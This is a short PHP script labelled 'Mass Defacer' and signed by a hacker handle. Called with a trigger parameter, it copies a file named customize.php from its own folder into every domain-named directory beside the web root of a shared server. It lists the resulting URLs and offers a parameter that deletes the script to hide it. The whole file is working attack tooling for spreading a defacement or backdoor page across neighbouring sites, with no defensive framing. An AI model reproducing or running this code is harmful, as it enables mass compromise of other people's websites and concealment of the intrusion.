<?php
# coded By S911lo HaCkEr
echo "<title>Mass Defacer - By S911lo HaCkEr</title>";
function injct(){
if (isset($_GET['mass']) && $_GET['mass'] == "xx")
{
$MyPath = dirname(__FILE__);
$PathDomain = dirname($_SERVER['DOCUMENT_ROOT']);
if (!file_exists ($PathDomain))
die ($PathDomain." Not Found !<br>");
if (!is_dir ($PathDomain))
die ($PathDomain." Is Not A Directory !<br>");
@chdir ($PathDomain) or die ("Cannot Open Directory");
$files = @scandir ($PathDomain) or die ("oohhh shet<br>");
#$urlFileincj = file_get_contents("customize.php");
$BackFile = "customize.php";#$_GET['Myfile'];
foreach ($files as $file):
if ($file != "." && $file != ".." && @filetype ($file) == "dir")
{
$firstCharacters = substr($file, 0, 1);
if($firstCharacters != "."){
if (strpos($file, '.') !== false) {
$index = dirname($_SERVER['DOCUMENT_ROOT'])."/".$file."/".$BackFile;
$urlPath = "https://".$file."/".$BackFile;
if (copy($MyPath."/".$BackFile , $index))
echo "<b>$urlPath</b><br>";
}
}
}
endforeach;
}
}
injct();
if(isset($_GET['unfile'])){
unlink(__FILE__);
}
?>